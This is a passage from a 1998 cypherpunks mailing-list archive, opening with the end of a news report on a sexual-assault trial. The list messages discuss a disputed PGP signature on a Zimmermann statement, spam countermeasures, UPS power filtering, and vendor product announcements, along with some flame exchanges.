   "He tried to catch me," she said.  "I just kept fighting.  I wouldn't
let him get any part of me.  I ran to the door and clenched the handle
because I was not going to be tied up again."

   The woman says her tormentor was Oliver Jovanovic, 31, a Columbia
University doctoral candidate in molecular biology whom she met in an
Internet chat room.

   Jovanovic is charged with kidnapping, sodomy, aggravated sex abuse and
assault against the woman in his apartment following their first date Nov.
22, 1996.

   The woman said Jovanovic had tied her up, dripped hot candle wax on her
abdomen and genital area, bit her breasts until they bled and used a
nightstick to sexually abuse her.

   The woman said Jovanovic attacked her after a discussion about good and
evil and became upset when she said she believes people are not inherently
evil.  He then ordered her to undress, she said.

   Defense lawyer Jack Litman said no violence occurred between the two and
that any sexual activity, while it might have been unusual, was consensual.

   He quoted from e-mail messages sent by the woman to Jovanovic before and
after their date in which she talks about sadomasochism in what appear to
be terms of approval.

   The e-mail messages the woman sent to Jovanovic included one that reads
"Rough is good," and another that reads "I would go through the pleasure of
hell's pain."

   The woman testified that she sought out Jovanovic because she thought he
was intelligent, knowledgeable and interesting.

   Litman called the woman unstable and overly imaginative.  He said she is
blaming the evening's activity on Jovanovic to absolve herself of something
she likes but considers dirty.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <this-will-bounce@zoom.nu>
Date: Wed, 18 Mar 1998 12:26:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: PRZ comments
Message-ID: <199803182030.VAA13078@china.netassist.se>
MIME-Version: 1.0
Content-Type: text/plain


>> begin PRZ email<<<

Date: Wed, 18 Mar 1998 01:20:34 -0800
To: estone@synernet.com
From: Philip Zimmermann <prz@pgp.com>
Subject: PGP/NAI merger and key recovery
Cc: prz@pgp.com

Ed, I saw your recent remarks in comp.security.pgp.discuss.  I'd like
to make a few points.  You may quote me on this.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Mergers are complex operations, especially mergers of publicly traded 
companies of this size.  NAI and TIS will not fully close the merger deal 
for about 60 days.  Until then, there are many policy details we cannot 
discuss in public.

NAI has no plans to incorporate TIS's key recovery technology in any 
version of PGP, including our business versions.  I have discussed this
point with NAI management.

I have not changed my political values regarding privacy and crypto.
I would not have allowed the sale of my company to NAI if they were 
going to buy PGP in order to bury PGP, as some have feared.  They 
bought PGP because they value the reputation that PGP has earned in 
the industry.  They want to preserve that reputation by preserving 
PGP's product integrity.  I plan to keep watch over PGP's product 
integrity for the foreseeable future.

NAI plans to keep publishing our source code for peer review.  Source 
code publication in printed books is a vital part of NAI's business 
strategy, especially its overseas strategy.  There will be an important
announcement on this subject on 20 March at CeBit in Hannover Germany.

-Philip Zimmermann

-----BEGIN PGP SIGNATURE-----
Version: PGP 5.5.5

iQA/AwUBNQ+RzWPLaR3669X8EQLuRwCcDowyBBr32YtbsnYSHy6clTW+7CwAnjpk
KnVN0NVreBNuIOyxsAcWIb40
=vY/q
-----END PGP SIGNATURE-----

>>>end PRZ email<<<
--
-------------------
Ed Stone
estone@synernet.com
-------------------

I'm just curious, and no offense intended, but Phil's signature is bad in the signed message.  I'm using PGP 5.55, and it has his key in it, and it doesn't check out.  "Things that make you go 'hmmmmm'".......






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Wed, 18 Mar 1998 18:50:33 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: PRZ comments
Message-ID: <199803190250.VAA29972@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 3/18/98 3:30 PM, Anonymous (this-will-bounce@zoom.nu)  passed this
wisdom:

>
>>> begin PRZ email<<<
>
>Date: Wed, 18 Mar 1998 01:20:34 -0800
>To: estone@synernet.com
>From: Philip Zimmermann <prz@pgp.com>
>Subject: PGP/NAI merger and key recovery
>Cc: prz@pgp.com
>
>Ed, I saw your recent remarks in comp.security.pgp.discuss.I'd like
>to make a few points.  You may quote me on this.
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1

 The signature fails ....

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNRCH4T7r4fUXwraZAQEGuAf/SkPKROnsZpZnLfZQ5uiT5RwBw2RTNeky
gKEGXOlTFrDRHq00qm5xovXp7Oohw0JsqthwkVHiLLAPHJWEVtjzhgV0B291gF1p
2w/giHj6yl8sh1gExjLqb7Xe+NH3xy3myan6vCNFzcn2GG9QIIBZjEpg/noYt4GI
2mgFcauYk9mNBKi1AWJprz5O7ZS9oF/Q8om9K+CVS5ejCQXQCeeIy82hBE5Dlglg
nk00fyiC9mImJo6ZdSGAM4OG7d5LiHZ4s5ZKCxai/Bf03YSm8fByEUsSLnDVmjyd
xRGzpQhawCbvr6EQ0X1lPMiB36VnBp5I/sPLjm0OnuBAOOzwXUvtDw==
=TkXG
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

"May God stand between you and harm, in all the empty places where you
 must walk." - Susan Ivonava, Babylon 5






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Wed, 18 Mar 1998 19:30:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <c27f2c437b0635833db7515caa29f5d3@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain


Fuck U Dickwads wrote:
> 
> Those reporters who step outside of the scratch-and-sniff mentality
> that guarantees a large pay-per-sniff audience of rubberneckers are
> asking questions that have to do with access to 'National Security'
> matters (deemed important enough to destroy the Constitution over) being
> granted to individuals whose main qualification seems to be a great
> set of hooters, or a sizeable donation to the correct political party.

I count on TruthMonger as -my- mainstream news source.

I'llKissYouOnTheLipsButIWon'tPutMyTongueInYourMouthMonger






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tristan Muller" <tristanm@bulletproof.com>
Date: Wed, 18 Mar 1998 23:13:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: JDesignerPro 2.5 just released
Message-ID: <19980319070533968.AQZ71@www.bulletproof.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi Cypher,
As a Microsoft Site Builder participant, BulletProof Corporation wants you 
to know about our latest release:  

Just Released!

A while back you downloaded JDesignerPro 2.02 from the Site Builder 
Network.  Version 2.5 is a much improved product with new Wizards, 
printing capability, JavaBeans support, the Deployment Manager and 
many other enhancements. 

JDesignerPro 2.5
The Java RAD Tool for Business Applications

Download a free trial today (3MB):  http://www.bulletproof.com

*  WIN JDesignerPro - $1200 Product Giveaway: 
Download and Install JDesignerPro 2.5 to find out how to win. Contest 
ends March 28th.

* Buy before April 9th to save $300
As of April 9, 1998 the price of the JDesignerPro Standard System 
will increase to $995.  Until then BulletProof is offering a grace period 
at the current $695 price.  

* JDesignerPro 2.5 Is For You
JDesignerPro 2.5 is an easy to use tool for developers to build and 
deploy data-driven business applications for the Web - Sales 
Management, Inventory Management, Help Desk, Customer Care, 
Decision Support, etc.  If you need to manage data through an Intranet, 
JDesignerPro is for you.  For many basic database applications, no 
knowledge of Java is required.

* Press Quotes
"If you're looking for a database development environment that 
leverages Java's finest virtues, JDesignerPro is it."  DBMS Magazine

"This may be one of JDP's biggest advantages for database developers 
who find themselves thrust into Java development: No Java 
programming is necessary. Developers can implement any standard 
functions simply by associating one component's method with another 
component's event."  InternetWorld magazine

* Microsoft Site Builder Network
Microsoft is one of our best partners and they've agreed to offer the 
new version 2.5 of JDesignerPro on the updated Site Builder Network.  
If you're a Site Builder member, you'll see BulletProof listed on the 
download area.  

* Major New Features of JDesignerPro 2.5

* FastSockets(tm) Technology in JAGGServer.  With BulletProof's 
innovative FastSockets you'll see substantial speed improvements 
of nearly 300% throughout the development and deployment 
processes.  FastSockets is a seamless integration requiring no 
effort on your part.  The included JAGGServer(tm) middleware 
handles JDBC/ODBC database access, load balancing and more.  
All SQL and server messaging is created automatically.

* Application Wizards -   The Screen Wizards are now part of the
Application Builder.  Build complete forms, charts, master/details 
70% faster than before.  

* Enhanced Data Wizards - Unprecedented speed, thanks to 
FastSockets, and ease in building complex data-aware interfaces.

* Year 2000 compliance - With the end of the millennium lurking 
JDesignerPro is fully year 2000 compliant. You can now easily 
specify your default date format. 

*  International Language Support - JDP now lets you customize the
interface to allow for different language support. This feature can 
also be used to customize the labels and messages of JDesignerPro 
to your needs. 

*  New component features - Several new features have been 
added to the existing JDesignerPro components such as date pop 
ups in the Text Grid again allowing you to create the most powerful 
finished application without any hand coding. 

Download a free trial today:  http://www.bulletproof.com

*  WIN JDesignerPro - $1200 Product Giveaway: 
Download and Install JDesignerPro 2.5 to find out how to win. Contest 
ends March 28th.

* See us at JavaOne, Moscone Center, San Francisco, March 24-27 
in the Sun partner pavilion!

Thanks for taking the time to read this.

Regards,
Tristan Muller
Customer Support
BulletProof Corporation


*If you don't want to be notified of future product releases simply reply 
to this message and place the word 'remove' in the subject.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Spectre <spectre@anthrax.net>
Date: Wed, 18 Mar 1998 20:38:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Software license detector vans
In-Reply-To: <35100ECB.4466@nac.net>
Message-ID: <B0000003841@hades.crmcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 20:44 3/18/98 -0500, you wrote:
>Standard UPS's do not operate with their batteries "on-line" but in
>standby mode. Because of this you do not get any of the filtering affect
>from the batteries. You can get good "online" UPS's with gel-cell battery
>banks but they cost $$$. Look at some of the companies that service the
>telcom industry providing UPS for switchrooms. Line conditioning on the
>standard UPS's (PC Decsktop grade) is medeocere at best and are designed
>for leveling out power fluctuations not for filtering data leakage.
>
>If Tempest is a serious concern I recomend a dual battery bank so one bank
>can be charging while the other is in use. Physicial disconnects on both
>battery banks between the computer and between outside power grid to
>insure physicial issolation durring operations.

While I agree with you in that total security is only possible if you
completely isolate the system, I think that the original person posting
wasn't referring to the batteries, but rather the conditioning that is
going on inside the UPS.  Any decent ups will put the incoming power
through a "conditioner" that will filter out noise in the incoming power,
and rebuild the wave so that transient sags and spikes don't get through.

It stands to reason that these filters would work in reverse, since they
are AC filters.  Most AC circutry works equally well in reverse as forward.
 DC circuitry would probably filter out noise equally as well since it
simply won't work in reverse for the most part, it'll simply resist any
reverse current until it blows.

Of course, I make no claims about noise that the transformer itself may
make while it does it's filtering that someone might be able to use to
determine what was filtered out.


-The Spectre [SP4 w/ Clam Cluster]
-http://www.anthrax.net/cos
"No man is clever enough to know all the evil he does."  -  La Rochefoucauld





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Thu, 19 Mar 1998 00:40:17 -0800 (PST)
To: Ryan Anderson <jya@pipeline.com>
Subject: Re: Will New Sendmail Block Remailers?
In-Reply-To: <1.5.4.32.19980317141322.006c25cc@pop.pipeline.com>
Message-ID: <v03110765b1367c65ccd4@[207.94.249.79]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:58 AM -0800 3/17/98, Ryan Anderson wrote:
>> Markoff in the NYT reports today on the release of a new
>> Sendmail upgrade by author Eric Allman that will block
>> spam by checking the legitimacy of the originating address
>> before delivery.
>>
>> ...
>
>All it really does is force spammers to search for someone's real address
>to spoof and harass.  (They can just scan usenet, and pick on random
>people if they want..)

The ultimate end of this line of measure/countermeasure is code that sniffs
out peoples passwords so spammers can "borrow" their accounts to send a
million or so messages.


-------------------------------------------------------------------------
Bill Frantz       | If hate must be my prison  | Periwinkle -- Consulting
(408)356-8506     | lock, then love must be    | 16345 Englewood Ave.
frantz@netcom.com | the key.     - Phil Ochs   | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Wed, 18 Mar 1998 21:47:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Chicken "anons" and "nobody's"
Message-ID: <170eb93a.3510b14a@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-18 22:53:53 EST, anon@anon.efga.org writes:

<< I count on TruthMonger as -my- mainstream news source.>>

Who's that, the "TruthMeister? (Rush Limbaugh)"

You would, you're an idiot (any person who counts on any one person as the
only source of news, is an idiot).

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Wed, 18 Mar 1998 22:08:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: UPSs
Message-ID: <5b89711e.3510b439@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-18 23:54:33 EST, spectre@anthrax.net writes:

<< ... Any decent ups will put the incoming power
 through a "conditioner" that will filter out noise in the incoming power,
 and rebuild the wave so that transient sags and spikes don't get through. ...
>>

BUT, even the fastest electronics cannot respond fast enough to the initial
spike, if that spike is too high in the first place (if your incoming power
lines get hit by lightning, for instance), it's already too late.  My
suggestion, don't trust a UPS to eliminate spikes, get it if you anticipate a
need for back-up power to shut down your system in case of black-out (and
screw the surge protectors, trust the filtering in your power supply to do
that for you.)

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 18 Mar 1998 16:18:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: PRZ 'corrections'
Message-ID: <199803190018.BAA11664@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous (from anon@anon.efga.org) wrote:

> Anonymous (from this-will-bounce@zoom.nu) wrote:
 > > I'm just curious, and no offense intended, but Phil's signature is
bad
> > in the signed message.  I'm using PGP 5.55, and it has his key in it,
> > and it doesn't check out.  "Things that make you go 'hmmmmm'".......

> You took out the space before "-Philip Zimmermann".  Put it back as it
> was originally and the signature verifies fine:

I'm getting mighty tired of the anonymous motherfuckers posting through
efga.org interfering with the attempts of the anonymous saints posting
through the other anonymous remailers to spread CSM (Cluelessness,
Stupidity and Misinformation) throughout the Internet.

Remember:
"If you're not living in space, you're taking up too much of the edge."
~ No Beer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yupin Mungdee <snickers@mejl.com>
Date: Thu, 19 Mar 1998 05:09:12 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Will New Sendmail Block Remailers?
In-Reply-To: <v03110765b1367c65ccd4@[207.94.249.79]>
Message-ID: <Pine.SOL.3.96.980319045525.2632A-100000@rigel.cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain



> >All it really does is force spammers to search for someone's real address
> >to spoof and harass.  (They can just scan usenet, and pick on random
> >people if they want..)
> 
> The ultimate end of this line of measure/countermeasure is code that sniffs
> out peoples passwords so spammers can "borrow" their accounts to send a
> million or so messages.

But that can be defeated with encryption.

Another possible "ultimate end" for the spammer wars would be making
spamming illegal, like fax spamming, and having the cops hunting down the
spammers. But that can be defeated with truly anonymous markets, still
assuming that encryption will be legal.

To really beat spamming we probably need filters that only allow messages
from inside our web of trust. Don't you agree?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Thu, 19 Mar 1998 02:11:53 -0800 (PST)
To: StanSquncr <StanSquncr@aol.com>
Subject: Re: Chicken "anons" and "nobody's"
In-Reply-To: <170eb93a.3510b14a@aol.com>
Message-ID: <Pine.SOL.3.96.980319050943.13142G-100000@c00069-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Mar 1998, StanSquncr wrote:

>In a message dated 98-03-18 22:53:53 EST, anon@anon.efga.org writes:
>
><< I count on TruthMonger as -my- mainstream news source.>>
>
>Who's that, the "TruthMeister? (Rush Limbaugh)"
>
>You would, you're an idiot (any person who counts on any one person as the
>only source of news, is an idiot).
>
>Stan
>

Well, Stan, all of the news you read ultimately comes from the one person
selected by Clinton to drive The Propoganda Machine up in Washington, DC.

Ken Williams

ORG: NC State Computer Science Dept     VP of The E.H.A.P. Corp.   
EML: jkwilli2@adm.csc.ncsu.edu          ehap@ehap.org             
WWW: http://152.7.11.38/~tattooman/     http://www.ehap.org/ 
PGP: finger tattooman@152.7.11.38                       







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Thu, 19 Mar 1998 02:36:22 -0800 (PST)
To: StanSquncr <StanSquncr@aol.com>
Subject: Re: UPSs
In-Reply-To: <5b89711e.3510b439@aol.com>
Message-ID: <Pine.SOL.3.96.980319053524.13142K-100000@c00069-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Mar 1998, StanSquncr wrote:

>In a message dated 98-03-18 23:54:33 EST, spectre@anthrax.net writes:
>
><< ... Any decent ups will put the incoming power
> through a "conditioner" that will filter out noise in the incoming power,
> and rebuild the wave so that transient sags and spikes don't get through. ...
>>>
>
>BUT, even the fastest electronics cannot respond fast enough to the initial
>spike, if that spike is too high in the first place (if your incoming power
>lines get hit by lightning, for instance), it's already too late.  My
>suggestion, don't trust a UPS to eliminate spikes, get it if you anticipate a
>need for back-up power to shut down your system in case of black-out (and
>screw the surge protectors, trust the filtering in your power supply to do
>that for you.)
>
>Stan

How many times have you been struck by lightning, Stan?  The effects are
showing...

Ken Williams

ORG: NC State Computer Science Dept     VP of The E.H.A.P. Corp.   
EML: jkwilli2@adm.csc.ncsu.edu          ehap@ehap.org             
WWW: http://152.7.11.38/~tattooman/     http://www.ehap.org/ 
PGP: finger tattooman@152.7.11.38                       







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 18 Mar 1998 20:55:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: MISTY1 and MISTY2
Message-ID: <199803190454.FAA23416@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



MISTY1 and MISTY2 operate with 64-bitplain text
and cypher text blocks and is contolled by
a 128-bit key.

These two encryption algorithms call MISTY
generically.


        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 19 Mar 1998 04:25:58 -0800 (PST)
To: StanSquncr <StanSquncr@aol.com>
Subject: Re: Chicken "anons" and "nobody's"
In-Reply-To: <170eb93a.3510b14a@aol.com>
Message-ID: <199803191225.HAA21960@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <170eb93a.3510b14a@aol.com>, on 03/19/98 
   at 12:46 AM, StanSquncr <StanSquncr@aol.com> said:

>In a message dated 98-03-18 22:53:53 EST, anon@anon.efga.org writes:

><< I count on TruthMonger as -my- mainstream news source.>>

>Who's that, the "TruthMeister? (Rush Limbaugh)"

>You would, you're an idiot (any person who counts on any one person as
>the only source of news, is an idiot).

You don't have a clue do you Stan??

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/esecure.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: If Windows sucked it would be good for something.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNREBTo9Co1n+aLhhAQE0tAP9GR39xeKrtAYRc31BjhjC6EGRqOI46we0
NFBwTWXX6saynTvEo4gdk35Kko9W/cEKAxNsOmjDz8zsFaCX0LJNtzzcVai6g7/t
o8GLb/PbDv3i1rMw/1vJqyvMH6D2d3IuIQvUFg0luNeHnSxUT+cze1r4moeHw+Fj
yTDV7hk+lb4=
=cOih
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 19 Mar 1998 06:05:57 -0800 (PST)
To: wire@monkey-boy.com
Subject: US court system
Message-ID: <351125DE.4F04@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Guys

When Sandia assigned me to break locks for the FBI/Engineering Research
Facility, project leader Peter Hamilton told me that if we got caught
there were judges who would help us.

I was not sure that I believe Hamilton then.  I do now.

Morales and I signed and mailed the petition for writ of prohibition
on the 18th

bill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mia Westerholm <Mia.Westerholm@DataFellows.com>
Date: Thu, 19 Mar 1998 05:06:29 -0800 (PST)
To: Crypto-Press-Global@DataFellows.com
Subject: Data Fellows Introduces the Security Solution for Corporate Networks - VPN+
Message-ID: <3.0.2.32.19980319134441.006a06d8@smtp.DataFellows.com>
MIME-Version: 1.0
Content-Type: text/plain


Data Fellows Ltd.  Media Release

For immediate release
19 March 1998

DATA FELLOWS INTRODUCES THE SECURITY SOLUTION FOR CORPORATE NETWORKS

F-Secure VPN+ offers worldwide strong security for all aspects of today's
networking

ESPOO, FINLAND  -- Data Fellows Ltd., a leading software development
company known for its F-Secure anti-virus and cryptography products, has
today introduced F-Secure VPN+, a complete security solution for all
enterprise networking.

F-Secure VPN+ is the successor of the award winning F-Secure VPN, an
encrypting router that enables one to build a virtual private network over
the Internet using strong cryptographic security. Now the F-Secure VPN+
product family is going one step further by facilitating the security
integration of small sites and independent workstations to the corporate
network.  The extended corporate network may include corporate sites,
partners or distributors, remote offices and even laptops. 

F-Secure VPN+ consists of three products: F-Secure VPN+ Gateway, F-Secure
VPN+ Client (for the desktop), and F-Secure VPN+ Server. These components
can be combined to build a variety of secure virtual private networks that
cover all aspects of corporate networking. Such VPNs include the following: 

- Business VPN+: provides a cost-effective security solution for intranet
connections between corporate sites. In-corporate communication can be
encrypted with powerful F-Secure VPN+ Gateways regardless of the network
technology.

- Partner VPN+: offers strong authentication and filtering capabilities for
extranet connections between an organization and its partners,
subcontractors, or distributors.  It keeps unwanted users out and
facilitates secure communication no matter where the data goes to.

- Remote Office VPN+: supports telecommuting as a method of working.  It is
a scaleable and cost-effective solution for securing communication over the
Internet for the Small Office and the Home Office.  

- Traveling VPN+: secures the extension of the corporate network to
employees on the road.  Typical remote networking applications, such as
email, or accessing corporate file servers, can be secured transparently.

- Service VPN+: is suitable for organizations offering systems management
services.  It ensures that only the authorized systems manager can access
the remote system and that administration data cannot be seen or tampered
with by unauthorized outsiders.  Service VPN also provides Internet Service
Providers with the opportunity to find new sources of revenue by offering
VPN based services, or hybrid customer networks with VPN links. Its
powerful management features help the operator in maintaining the customer
network.

"Small and medium sized organizations don't need to wait any more," Mr.
Jukka Kotovirta, Director of Sales from Data Fellows. "They are now able to
build their own networks by using regular Internet connections combined
with the 
F-Secure VPN+ security solutions. Large organizations can also utilize 
F-Secure VPN+ to extend their corporate network to sites outside the
corporate domain." 

F-Secure VPN+ is firewall and router independent, allowing for the building
of extranets on top of existing infrastructures.

"The F-Secure VPN+ architecture is uniquely wide:  it is compatible with
all existing router and firewall solutions, and all major platforms," says 
Mr. Kotovirta.  "For the end user, the strength of the product is its
transparency. As F-Secure VPN+ operates at the OSI level 3, which is
invisible at the application level, it does not require any changes to
applications or their configurations."  

The F-Secure VPN+ will be released in June-July 1998.  F-Secure VPN+ Server
will initially be available for Microsoft Windows NT and Sun Solaris. 
F-Secure VPN+ Gateway will operate in Windows NT and Solaris. 
F-Secure VPN+ Client will initially operate in Solaris, Windows NT 4 and
Windows95. The products use the SSH and IPSec security protocols.


About Data Fellows:

Data Fellows is one of the world's leading developers of data security
products with offices in San Jose, California and Espoo, Finland. Its
groundbreaking 
F-Secure product family is a unique combination of globally available,
strong encryption and revolutionary anti-virus software.  The integrated
F-Secure product range provides a complete security solution for
enterprises, and includes file encryption and IPSec communication
encryption products, VPN gateways, SSH based secure remote management
software, and a full range of anti-virus products to workstations, servers
and gateways.  Data Fellows is also the developer of the award winning
F-PROT Professional anti-virus, now part of the dual scanning engine
concept of F-Secure Anti-Virus.   

Data Fellows is privately owned.  Since it was founded in 1988, its annual
net growth of net sales has been over 80%.  Data Fellows offers a worldwide
network of technical support, training and distribution in over 70 countries. 
Data Fellows belongs to an elite group of companies that have a triple-A
rating from Dun&Bradstreet.


For further information, please contact:

Mr. Jukka Kotovirta, Director of Sales 
Tel.  +358 9 859 900, Fax. +358 9 8599 0599
E-Mail:  jukka.kotovirta@DataFellows.com

or visit our web site at 
http://www.datafellows.com

ALSO, VISIT OUT BOOTH AT CEBIT98 (HALL 3, STAND B46)


Mia.Westerholm@DataFellows.com 
http://www.DataFellows.com

Data Fellows Ltd.
PL 24
FIN-02231 ESPOO, FINLAND
Tel. +358 9 859 900
Fax. +358 9 8599 0599




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Soft Export- Nancy Matte'" <info@softexport.com>
Date: Thu, 19 Mar 1998 11:40:17 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: Re: Your Request for information on JDesignerPro from BulletProof, Corp
Message-ID: <01BD5345.2D145D00.info@softexport.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi Cypher

Your inquiry to BulletProof, Corp about JDesignerPro was forwarded to us on 
Thursday, March 19, 1998.

Soft/Export is celebrating the latest release of JDesignerPro V2.32- the 
Java Client-Server interface builder.

With the ability to import any Java class JDesignerPro now becomes the best 
RAD tool for creating solutions using third party Java classes such as 
those from JScape, I-Kinetics, Rogue Wave, the KL Group, Microsoft, 
Netscape or even your own in house components or objects.

Version.2.32 supports not only importing of JavaBeans but also importing of 
ANY Java object. You can now use the AFC, IFC, JFC or any other FC that you 
can get your hands on.

This is the only 100% Pure Java tool which takes you from initial 
development to deployment all in the same environment.  Soft/Export is the 
master international reseller for JDesignerPro outside of the U.S.

If you are interested in placing an order for JDesignerPro, please fax a 
purchase order with shipping and credit card details to +353 1 294 2197 or 
email to sales@softexport.com.

To find out more about JDesignerPro or any of the other products we sell, 
visit our website at:  www.softexport.com.

Please see below for special pricing on JDesignerPro.

Please don't hesitate to contact me if you have any questions or require 
any additional assistance

BR-JDPSS2.32	 dollars	J Designer Pro 2.32 Standard System
BR-JDPEL2.32	249 dollars	J Desinger Pro 2.32  Entry Level


Yours sincerely,

Noel Hall - SoftExport, Ltd
Email: noelh@softexport.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Briggs <ian@deepwell.com>
Date: Fri, 20 Mar 1998 14:32:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Does Spamming Really Exist? / Re: Will New Sendmail Block Remailers?
In-Reply-To: <3512E780.5FBD@dev.null>
Message-ID: <3.0.3.32.19980319142712.0095f1e8@deepwell.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Spamming is an 'imaginary' felony, as are anonymity and encryption.

No, its actually theft of services.  

Imagine if I called you collect anytime I was out and about and your phone
automatically accepted the charge.  Then I spent a couple minutes filling
you in on my day, and how I felt.

The end of the month you get a couple hundred dollar collect bill.  

Not to mention that you don't have call waiting and there may have been
important phone calls that will have to call back later.

Then imagine I stole your cell phone to call you collect while I roamed
around other cities and filled you in on how I felt about the day so far.

And you used your Cell phone for work, and lots of people were calling you
but you weren't getting the messages, and you ended up loosing customers.


1.  ISP pay for bandwidth.
	If your outside the US 128Kbps lines can go upwards of several thousand 	a
month.
2.  Spammers relay through other ISP mail servers.
	This usually kills their mail server, or they get added to Paul Vixie's
blackhole list.
3.  It wastes ISP time.
	ISP get dozens of complaints a day and have to explain to every newbie
exactly what spam is, why they got it, etc. etc.

I know, im an ISP.

Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Thu, 19 Mar 1998 13:16:22 -0800 (PST)
To: snickers@mejl.com
Subject: Re: Will New Sendmail Block Remailers?
In-Reply-To: <Pine.SOL.3.96.980319045525.2632A-100000@rigel.cyberpass.net>
Message-ID: <199803192105.QAA27595@alcove.wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Yupin Mungdee enscribed thusly:
> 
> > >All it really does is force spammers to search for someone's real address
> > >to spoof and harass.  (They can just scan usenet, and pick on random
> > >people if they want..)
> > 
> > The ultimate end of this line of measure/countermeasure is code that sniffs
> > out peoples passwords so spammers can "borrow" their accounts to send a
> > million or so messages.
> 
> But that can be defeated with encryption.
> 
> Another possible "ultimate end" for the spammer wars would be making
> spamming illegal, like fax spamming, and having the cops hunting down the
> spammers. But that can be defeated with truly anonymous markets, still
> assuming that encryption will be legal.

	Oh yeah right...  Just like gambling being illegal has eliminated
it from the Internet.  We need to make it UNPROFITABLE and the scum will
slink back under the rocks they came from.

> To really beat spamming we probably need filters that only allow messages
> from inside our web of trust. Don't you agree?

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Thu, 19 Mar 1998 13:40:10 -0800 (PST)
To: jkwilli2@unity.ncsu.edu
Subject: Re: Chicken "anons" and "nobody's"
Message-ID: <31b0872b.3511906c@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-19 05:11:50 EST, jkwilli2@unity.ncsu.edu writes:

<< Well, Stan, all of the news you read ultimately comes from the one person
 selected by Clinton to drive The Propoganda Machine up in Washington, DC. >>

